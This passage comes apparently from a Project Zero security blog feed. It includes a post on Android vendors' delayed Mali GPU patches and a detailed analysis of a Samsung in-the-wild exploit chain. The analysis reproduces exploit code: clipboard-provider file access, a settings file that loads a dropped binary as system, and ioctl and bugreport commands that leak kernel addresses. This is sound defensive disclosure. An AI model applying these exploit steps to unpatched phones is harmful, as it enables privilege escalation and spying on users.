

This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Zijlstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue - KASLR is comprehensively compromised on x86 against local attackers, has been for the past several years, and will remain so for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.


Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in-the-wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title: Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE: CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue: 6th January 2022

Impact: A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) led to kernel memory corruption, one (2331) led to physical memory addresses being disclosed to userspace, and the remaining three (2325, 2327, 2333) led to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs: "Arm Mali: driver exposes physical addresses to unprivileged userspace"

@jgrusko (replying to @ProjectZeroBugs): "RIP the feature that was there forever and nobody wanted to report :)"

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are advised to patch as quickly as they can once a release containing security updates is available, the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocked on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Posted by Maddie Stone, Project Zero

Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, and CVE-2021-25370. To ensure your Samsung device is up-to-date, you can check under Settings that your device is running SMR Mar-2021 or later.

As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendors’ transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.

While Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward Samsung has committed to publicly sharing, as part of their release notes, when vulnerabilities may be under limited, targeted exploitation.

We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a three-vulnerability chain where all three vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.

The sample used three vulnerabilities, all patched in March 2021 by Samsung:

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337
  2. Kernel information leak via sec_log - CVE-2021-25369
  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370

The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example, the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC, while phones sold in most other places (e.g. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver, which are specific to the Exynos Samsung phones.

Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.

The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.

Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: “SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider. Severity: Moderate. Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0). Reported on: November 3, 2020. Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service.”

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.

According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.

Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:


        DATABASE_NAME = ‘clipboardimage.db’

        TABLE_NAME = ‘ClipboardImageTable’

        URL = ‘content://com.sec.android.semclipboardprovider/images’

        CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";

Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.

UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>

Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.

    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.

The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.

ContentValues vals = new ContentValues();
vals.put("_data", "/data/system/users/0/newFile.bin");
Uri semclipboard_uri = Uri.parse("content://com.sec.android.semclipboardprovider");
ContentResolver resolver = getContentResolver();
Uri newFile_uri = resolver.insert(semclipboard_uri, vals);
return resolver.openFileDescriptor(newFile_uri, "w").getFd();

Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
  4. Get the ContentResolver object that allows apps access to ContentProviders.
  5. Call insert on the semclipboardprovider with our key-value pair.
  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.

The exploit wrote its next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app processes don’t have access to open or create users_system_data_file files, so in this case the exploit is proxying the open through system_server, which can open users_system_data_file. While untrusted_app can’t open users_system_data_file files itself, it can read and write to them once it has a file descriptor. Once the clipboard content provider opens the file and passes the fd to the calling process, the calling process can read and write to it.

The exploit first uses this fd to write its next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.

This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks that the calling process’s UID is 1000 (system), meaning that the caller is already running with system privileges.

  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how does it load it outside of its current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).

The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.

Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.

The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.

To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="eng-USA-Variant Info">f00</string>
    <string name="SMT_STUBCHECK_STATUS">STUB_SUCCESS</string>
    <string name="SMT_LATEST_INSTALLED_ENGINE_PATH">/data/system/users/0/newFile.bin</string>
</map>

The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.

The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems that devices launched on Android 10 (Q) shipped with an updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.

Phones released on Android P and earlier appear to have had a pre-3.0.08.18 version of the app, which did load the executable, through at least December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.

Once the ELF file is loaded via the System.load API, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.

The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.

Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: “SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log. Severity: Moderate. Affected versions: O(8.x), P(9.0), Q(10.0). Reported on: December 10, 2020. Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file.”

The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.

void __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);

        if (args)

                vprintk(args->fmt, args->args);

        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}

On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 

a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };

Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.

The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F) still used a vulnerable version of the driver (r19p0) as of January 2021.

/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;

        cli = filp->private_data;

        if (!cli)

                return -EINVAL;

        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

       

        [...]

        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }

        return rcode;

}

Specifically, the WARN_ON is in the function kbasep_vinstr_hwcnt_reader_ioctl. To trigger it, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: first the Mali driver’s HWCNT_READER_SETUP ioctl, to initialize the hwcnt driver and be able to call ioctls, and then an ioctl on the hwcnt fd with an invalid ioctl number: 0xFE.

   hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

   ioctl(hwcnt_fd, 0x4004BEFE, 0);

To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:

setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;

In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport.

allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;

The bugreport service is defined in /system/etc/init/dumpstate.rc:

service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot

The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.

The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.

  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");

After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed, so this watch fires when dumpstate has finished writing to sec_log.log.
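A sketch of that wait, using the standard Linux inotify API:

#include <string.h>
#include <sys/inotify.h>
#include <unistd.h>

// Block until a file opened for writing in /data/log/ is closed; when the
// closed file is sec_log.log, dumpstate has finished and the log is ready
// to parse.
int wait_for_sec_log(void) {
    char buf[4096];
    int fd = inotify_init();
    if (fd < 0)
        return -1;
    if (inotify_add_watch(fd, "/data/log/", IN_CLOSE_WRITE) < 0) {
        close(fd);
        return -1;
    }
    for (;;) {
        ssize_t len = read(fd, buf, sizeof(buf));
        if (len <= 0)
            break;
        for (ssize_t off = 0; off < len; ) {
            struct inotify_event *ev = (struct inotify_event *)(buf + off);
            if (ev->len && !strcmp(ev->name, "sec_log.log")) {
                close(fd);
                return 0;
            }
            off += (ssize_t)(sizeof(*ev) + ev->len);
        }
    }
    close(fd);
    return -1;
}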

An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values from the dumped exception stack, on the lines ending in b60 and bc0: the task_struct address and the sys_call_table address.

<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74

The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.

$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app

allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };

allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.
  • Removed the bugreport service from dumpstate.rc.

In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.
  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.

Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access.

Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19925 (CVE-2021-25370): Memory corruption in dpu driver  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0), R(11.0) devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption.

Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.

The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:

stream lids=0,3,4

The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’; once it finds such a log entry, it reads the PID from it.
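A sketch of that interaction (assuming /dev/socket/logdr behaves as liblog's SOCK_SEQPACKET reader socket; real log records are binary logger_entry structs, so scanning raw bytes for the marker strings is a simplification):

#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

// Connect to LogReader, request the main (0), system (3) and crash (4)
// buffers, and read records until one mentions the display/composer.
int find_composer_log_entry(void) {
    struct sockaddr_un addr = { .sun_family = AF_UNIX };
    strncpy(addr.sun_path, "/dev/socket/logdr", sizeof(addr.sun_path) - 1);
    int fd = socket(AF_UNIX, SOCK_SEQPACKET, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        close(fd);
        return -1;
    }
    const char *cmd = "stream lids=0,3,4";
    write(fd, cmd, strlen(cmd));
    char buf[8192];
    ssize_t n;
    while ((n = read(fd, buf, sizeof(buf) - 1)) > 0) {
        buf[n] = '\0';
        if (strstr(buf, "display") || strstr(buf, "SDM"))
            break;  // a real implementation parses the PID from this entry
    }
    close(fd);
    return n > 0 ? 0 : -1;
}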

Now it has the PID of android.hardware.graphics.composer, the Hardware Composer HAL.

